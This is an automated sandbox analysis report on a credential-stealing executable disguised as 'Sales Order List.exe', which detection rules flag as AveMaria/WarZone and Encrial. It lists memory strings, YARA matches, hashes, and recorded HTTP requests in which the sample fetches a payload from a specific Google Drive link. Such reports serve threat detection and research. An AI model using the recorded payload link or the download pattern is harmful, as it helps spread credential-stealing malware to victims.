                Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
                Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/7
                Source: Sales Order List.exe, 00000004.00000003.125871877283.0000000001883000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/S~
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5i
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/w
                Source: Sales Order List.exe, 00000004.00000003.125871692204.0000000001870000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/4
                Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn
                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnY
                Source: Sales Order List.exe, 00000004.00000003.125743205436.00000000018AE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnawmvg8FJU4CwcICFY
                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnc
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.comn
                Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
                Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpString found in binary or memory: https://outlook.comows.CB
                Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.office.com8
                Source: WerFault.exe, 00000014.00000003.125950197304.0000000002D61000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemet
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://windows.msn.com:443/shell
                Source: explorer.exe, 0000000B.00000002.130416256186.00000000104AE000.00000004.00000001.sdmpString found in binary or memory: https://wns.windows.com/
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpString found in binary or memory: https://word.office.com
                Source: explorer.exe, 0000000B.00000002.130414430727.0000000010370000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
                Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpA
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpU
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: unknownDNS traffic detected: queries for: drive.google.com
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49806 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49807 version: TLS 1.2
                Source: WerFault.exe, 00000014.00000003.125903793452.0000000002D9E000.00000004.00000001.sdmpBinary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
                Source: Sales Order List.exeBinary or memory string: GetRawInputData

                E-Banking Fraud:

                barindex
                Yara detected AveMaria stealerShow sources
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Initial sample is a PE file and has a suspicious nameShow sources
                Source: initial sampleStatic PE information: Filename: Sales Order List.exe
                Source: Sales Order List.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E1E3D2_2_022E1E3D
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED6712_2_022ED671
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022F6B372_2_022F6B37
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EDBA32_2_022EDBA3
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022ED01F2_2_022ED01F
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E3D312_2_022E3D31
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC22A2_2_022EC22A
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E42792_2_022E4279
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EAE562_2_022EAE56
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022E42A52_2_022E42A5
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EAAA32_2_022EAAA3
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EA68C2_2_022EA68C
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EE2952_2_022EE295
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EA6912_2_022EA691
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function: 2_2_022EC2E42_2_022EC2E4
                Source: C:\Users\user\Desktop\Sales Order List.exeCode function